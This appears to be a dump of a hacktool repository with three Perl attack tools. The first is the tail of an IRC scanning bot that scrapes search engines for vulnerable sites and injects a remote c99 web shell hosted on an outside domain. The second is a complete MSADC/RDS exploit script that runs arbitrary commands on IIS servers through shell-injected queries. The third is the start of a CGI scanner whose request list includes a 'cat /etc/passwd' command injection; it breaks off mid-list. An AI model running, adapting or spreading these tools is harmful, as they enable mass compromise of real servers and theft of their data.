if ($x =~ /\&lt\;/) {
$x =~ s/\&lt\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] 7Last Bug di milw0rm 12::.");
foreach $x (0..(@ltt - 1)) {
stampa($sk, "PRIVMSG $canale :12.::[13MillW0rm] list Bug Milw0rm $bug[$x] - $ltt[$x] 12::.");
sleep 1;
}}
if ($line=~ /PRIVMSG $canale :.scan\s+(.*?)\s+(.*)/){
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my $bug=$1;
my $dork=$2;
my $contatore=0;
my ($type,$space);
my %hosts;
stampa($sk, "PRIVMSG $canale :12.::[13Dork] $dork12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Bug] $bug12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Loading] 2Tunggu yach.. Yayang Lagi Mulai neh!12::.");
stampa($sk, "PRIVMSG $canale :12.::[13Google] Sabar yach Say.. Lagi scan nih!12::.");
my @glist=&google($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Yahoo] Sabar yach Say.. Lagi scan nih!12::.");
my @ylist=&yahoo($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Msn] Sabar yach Say.. Lagi scan nih!12::.");
my @mlist=&msn($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Altavista] Sabar yach Say.. Lagi scan nih!12::.");
my @alist=&altavista($dork);
stampa($sk, "PRIVMSG $canale :12.::[13Libero] Sabar yach Say.. Lagi scan nih!12::.");
my @llist=&libero($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AllTheWeb] Sabar yach Say.. Lagi scan nih!12::.");
my @allist=&alltheweb($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AsK] Sabar yach Say.. Lagi scan nih!12::.");
my @asklist=&ask($dork);
stampa($sk, "PRIVMSG $canale :12.::[13UoL] Sabar yach Say.. Lagi scan nih!12::.");
my @uollist=&uol($dork);
stampa($sk, "PRIVMSG $canale :12.::[13AoL] Sabar yach Say.. Lagi scan nih!12::.");
my @aollist=&aol($dork);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 2Lagi Scan untuk kamu say [9Dork] $dork12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Google ".scalar(@glist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Yahoo ".scalar(@ylist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] MsN ".scalar(@mlist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Altavista ".scalar(@alist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Libero ".scalar(@llist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] All-The-Web ".scalar(@allist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Ask ".scalar(@asklist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] UoL ".scalar(@uollist)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] AoL ".scalar(@aollist)." Situs!12::.");
push(my @tot, @glist, @ylist, @mlist, @alist, @llist, @allist,@asklist,@uollist,@aollist);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 12Total Scan 9,1H1,9e9,1n1,9C9,1a ".scalar(@tot)." Situs!12::.");
my @puliti=&unici(@tot);
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] 7Total Pencarian 9,1H1,9e9,1n1,9C9,1a ".scalar(@puliti)." Situs!12::.");
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Vulnerability 9,1H1,9e9,1n1,9C9,1a Scan!12::.");
my $uni=scalar(@puliti);
foreach my $sito (@puliti)
{
$contatore++;
if ($contatore %30==0){
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Injek<65> cinta ".$contatore." dari ".$uni. " situs12::.");
}
if ($contatore==$uni-1){
stampa($sk, "PRIVMSG $canale :12.::[9,1H1,9e9,1n1,9C9,1a] Selasai [13Dork] $dork12::.");
}
my $test="http://".$sito.$bug.$cmd."?";
my $print="http://".$sito.$bug."http://by-gardenfox.t35.com/c99.txt"."?";
my $req=HTTP::Request->new(GET=>$test);
my $ua=LWP::UserAgent->new();
$ua->timeout(5);
my $response=$ua->request($req);
if ($response->is_success) {
my $re=$response->content;
if($re =~ /Mic22/ && $re =~ /uid=/){
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :12.::[13Safe(12 OFF ) 4Sys(7 $type ) 6Free(14 $space )] $print12::.");
stampa($sk, "PRIVMSG MoKu :13.::[12Safe(4 OFF ) 7Sys(6 $type ) 14Free(6 $space )] $print12::.");
}}
elsif($re =~ /Mic22/)
{
my $hs=geths($print); $hosts{$hs}++;
if($hosts{$hs}=="1"){
$x=os($test);
($type,$space)=split(/\,/,$x);
stampa($sk, "PRIVMSG $canale :12.::[2Safe(4 ON ) 6Sys(7 $type ) 7Free(6 $space )] $print12::.");
}}
}}}
exit;
}}}
sub stampa()
{
if ($#_ == '1') {
my $sk = $_[0];
print $sk "$_[1]\n";
} else {
print $sk "$_[0]\n";
}}
sub os(){
my $sito=$_[0];
my $Res=query($sito);
my $type;
my $free;
my $str;
while($Res=~m/<br>OSTYPE:(.+?)\<br>/g){
$type=$1;
}
while($Res=~m/<br>Free:(.+?)\<br>/g){
$free=$1;
}
$str=$type.",".$free;
return $str;
}
sub aol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=100;$b++){
my $AoL=("http://search.aol.com/aol/search?query=".key($key)."&page=".$b."&nt=null&ie=UTF-8");
my $Res=query($AoL);
while($Res =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub google(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=100){
my $Go=("http://www.google.co.id/search?hl=id&q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub yahoo(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=100){
my $Ya=("http://search.yahoo.com/search?ei=UTF-8&p=".key($key)."&n=100&fr=sfp&b=".$b);
my $Res=query($Ya);
while($Res =~ m/\<em class=yschurl>(.+?)\<\/em>/g){
my $k=$1;
$k=~s/<b>//g;
$k=~s/<\/b>//g;
$k=~s/<wbr>//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while($Res=~m/<span class=ngrn>(.+?)\//g){
if($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub msn(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $MsN=("http://search.live.com/results.aspx?q=".key($key)."&first=".$b."&FORM=PERE");
my $Res=query($MsN);
while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if($1 !~ /msn|live/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub libero(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0,$pg=0; $i<=1000; $i+=10,$pg++)
{
my $Lib=("http://arianna.libero.it/search/abin/integrata.cgi?s=1&pag=".$pg."&start=".$i."&query=".key($key));
my $Res=query($Lib);
while($Res =~ m/<a class=\"testoblu\" href=\"?http:\/\/([^>\"]*)\//g){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub ask(){
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=10)
{
my $Ask=("http://it.ask.com/web?q=".key($key)."&o=312&l=dir&qsrc=0&page=".$i."&dm=all");
my $Res=query($Ask);
while($Res=~m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g){
my $k=$3;
$k=~s/[\"\ ]//g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub alltheweb()
{
my @lst;
my $key=$_[0];
my $i=0;
my $pg=0;
for($i=0; $i<=1000; $i+=100)
{
my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $Res=query($all);
while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){
my $k=$1;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}}
return @lst;
}
sub uol(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my $UoL=("http://busca.uol.com.br/www/index.html?q=".key($key)."&start=".$i);
my $Res=query($UoL);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
my $k=$1;
if($k!~/busca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}}}
return @lst;
}
sub links()
{
my @l;
my $link=$_[0];
my $host=$_[0];
my $hdir=$_[0];
$hdir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host.="/";
$link.="/";
$hdir.="/";
$host=~s/\/\//\//g;
$hdir=~s/\/\//\//g;
$link=~s/\/\//\//g;
push(@l,$link,$host,$hdir);
return @l;
}
sub geths(){
my $host=$_[0];
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
return $host;
}
sub key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/,/\%2C/g;
$chiave =~ s/\\/\%5C/g;
return $chiave;
}
sub query($){
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") {$query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ )
{
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}

517
Perl/HackTool.Perl.Mdctr Normal file
View File

@ -0,0 +1,517 @@
#
# MSADC/RDS 'usage' (aka exploit) script version 2
#
# by rain forest puppy
#
# - added UNC support, really didn't clean up code, but oh well
use Socket; use Getopt::Std;
getopts("e:vd:h:XRVNwcu:s:", \%args);
print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
-h <host> = host you want to scan (ip or domain)
-d <seconds> = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u <\\\\host\\share\\file> = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s <number> = run only step <number>
Or a -R will resume a (v2) command session
~; exit;}
###########################################################
# config data
@drives=("c","d","e","f","g","h");
@sysdirs=("winnt","winnt35","winnt351","win","windows");
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
@dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
"cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
"banner", "banners", "ads", "ADCDemo", "ADCTest");
# this is sparse, because I don't know of many
@sysmdbs=( "\\catroot\\icatalog.mdb",
"\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
"\\system32\\certmdb.mdb",
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
@mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
"\\cfusion\\cfapps\\security\\realm_.mdb",
"\\cfusion\\cfapps\\security\\data\\realm.mdb",
"\\cfusion\\database\\cfexamples.mdb",
"\\cfusion\\database\\cfsnippets.mdb",
"\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
"\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
"\\cfusion\\brighttiger\\database\\cleam.mdb",
"\\cfusion\\database\\smpolicy.mdb",
"\\cfusion\\database\cypress.mdb",
"\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
"\\website\\cgi-win\\dbsample.mdb",
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
); #these are just \
###########################################################
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $target= inet_aton($ip)
|| die("inet_aton problems; host doesn't exist?");}
if (!defined $args{R}){ $ret = &has_msadc; }
if (defined $args{X}) { &hork_idx; exit; }
if (defined $args{N}) { &get_name; exit; }
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
if (defined $args{R}) { &load; exit; }
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
if (!defined $args{s} || $args{s}==1){
print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;}
if (!defined $args{s} || $args{s}==2){
print "\nStep 2: Trying to make our own DSN...";
if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
print "<<fail>>\n"; }} # we need to sleep to let the server catchup
if (!defined $args{s} || $args{s}==3){
print "\nStep 3: Trying known DSNs...";
&known_dsn;}
if (!defined $args{s} || $args{s}==4){
print "\nStep 4: Trying known .mdbs...";
&known_mdb;}
if (!defined $args{s} || $args{s}==5){
if (defined $args{u}){
print "\xStep 5: Trying UNC...";
&use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}
if (!defined $args{s} || $args{s}==6){
if (defined $args{e}){
print "\nStep 6: Trying dictionary of DSN names...";
&dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}
print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
exit;
##############################################################################
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_;
print STDOUT "." if(defined $args{X});}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}
##############################################################################
sub make_header { # make the HTTP request
my $aa, $bb;
if (defined $args{V}){
$aa="VbBusObj.VbBusObjCls.GetRecordset";
$bb="2";
} else {
$aa="AdvancedDataFactory.Query";
$bb="3";}
$msadc=<<EOT
POST /msadc/msadcs.dll/$aa HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: $clen
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb
--!ADM!ROX!YOUR!WORLD!
Content-Type: application/x-varg
Content-Length: $reqlen
EOT
;
$msadc=~s/\n/\r\n/g;
return $msadc;}
##############################################################################
sub make_req { # make the RDS request
my ($switch, $p1, $p2)=@_;
my $req=""; my $t1, $t2, $query, $dsn;
if ($switch==1){ # this is the btcustmr.mdb query
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
$p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}
elsif ($switch==2){ # this is general make table query
$query="create table AZZ (B int, C varchar(10))";
$dsn="$p1";}
elsif ($switch==3){ # this is general exploit table query
$query="select * from AZZ where C='|shell(\"$command\")|'";
$dsn="$p1";}
elsif ($switch==4){ # attempt to hork file info from index server
$query="select path from scope()";
$dsn="Provider=MSIDXS;";}
elsif ($switch==5){ # bad query
$query="select";
$dsn="$p1";}
elsif ($switch==6){ # this is table-independant query (new)
$query="select * from MSysModules where name='|shell(\"$command\")|'";
$dsn="$p1";}
$t1= make_unicode($query);
$t2= make_unicode($dsn);
if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
$req.= "\x08\x00" . pack ("S1", length($t1));
$req.= "\x00\x00" . $t1 ;
$req.= "\x08\x00" . pack ("S1", length($t2));
$req.= "\x00\x00" . $t2 ;
$req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
return $req;}
##############################################################################
sub make_unicode { # quick little function to convert to unicode
my ($in)=@_; my $out;
for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}
##############################################################################
sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}
##############################################################################
sub make_dsn { # this (tries to) make a DSN for us
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
"Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
. $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
} return 0;}
##############################################################################
sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}
##############################################################################
sub try_btcustmr {
foreach $dir (@sysdirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";
save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}
##############################################################################
sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
$in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}
##############################################################################
sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}
##############################################################################
sub save {
my ($p1)=@_; my $ropt="";
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
if (defined $args{c}){ $ropt="c ";}
if (defined $args{V}){ $ropt.="V ";}
if (defined $args{w}){ $ropt.="w ";}
print OUT "v2\n$ip\n$ropt\n$p1\n";
close OUT;}
##############################################################################
sub load {
my ($action)=@_;
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
open(IN,"<rds.save") || die("Couldn't open rds.save\n");
@p=<IN>; close(IN);
die("Wrong rds.save version") if $p[0] ne "v2\n";
$ip="$p[1]"; $ip=~s/\n//g;
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
@switches=split(/ /,$p[2]);
foreach $switch (@switches) {
$args{$switch}="1";}
if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
print "Type the command line you want to run ($comm assumed):\n"
. "$comm ";
$in=<STDIN>; chomp $in;
$command="$comm " . $in ;
$torun="$p[3]"; $torun=~s/\n//g;
if($torun=~/btcustmr/){
$args{'c'}="1";} # this is a kludge to make it work
if($torun=~/^dbq/){ $torun=$drvst.$torun; }
if(run_query("$torun")){
print "Success!\n";} else { print "failed\n"; }
exit;}
##############################################################################
sub create_table {
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}
##############################################################################
sub known_dsn {
foreach $dSn (@dsns) {
print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}
##############################################################################
sub is_access {
my ($in)=@_;
return 1 if (!defined $args{c});
return 1 if (defined $args{V});
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}
##############################################################################
sub run_query {
my ($in)=@_; my $req;
if (defined $args{c}){$req=3;} else {$req=6;}
$reqlen=length( make_req($req,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req($req,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}
##############################################################################
sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";
foreach $drive (@drives) {
foreach $dir (@sysdirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv.$drive.":\\".$dir.$mdb)){
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive .":\\".$dir.$mdb); exit;
}}}}}
foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv.$drive.":".$mdb)){
if(run_query($drv.$drive.":".$mdb)){
print "$mdb: Success!\n"; save ("dbq=".$drive.":".$mdb); exit;
}}}}
}
##############################################################################
sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
$results[$c]=~s/\x00//g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
$results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
$results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
$d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server not installed/query failed\n"; }}
##############################################################################
sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
$hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
next if (!is_access("DSN=$dSn"));
if(create_table("DSN=$dSn")){
if(run_query("DSN=$dSn")){
print "Success!\n"; save ("dsn=$dSn"); exit; }}}
print "\n"; close(IN);}
##############################################################################
sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually
##############################################################################
sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}
if($error=~/server has denied access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}
##############################################################################
sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("^Server:",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n$s[0]\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}
##############################################################################
sub use_unc {
$uncpath=$args{u};
$driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
print "Your UNC path sucks. You need the following format:\n".
"\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }
if(create_table($driverline.$uncpath)){
if(run_query($driverline.$uncpath)){
print "Success!\n"; save ("dbq=".$uncpath); exit;}}
}
##############################################################################
sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive
ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0
--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}
##############################################################################
# special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
# #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
# good friends!), wiretrip, l0pht, nmrc & all of phrack
#
# thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
#
# I wish I could really name everyone, but I can't. Don't feel slighted if
# your not on the list... :)
##############################################################################

210
Perl/HackTool.Perl.Nrgscan Normal file
View File

@ -0,0 +1,210 @@
@scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
"GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /article.php HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
"GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
@names_w = ("/cgi-bin",
"/_vti_bin",
"/article",
"/_vti_bin",
"/Webdist",
"/msadc.pl",
"/RDS");
######### Fast Scan - script must be edited in sub version if it is to be used ##########
@scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
"GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
"GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
"GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
"GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
"GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
"GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
"GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
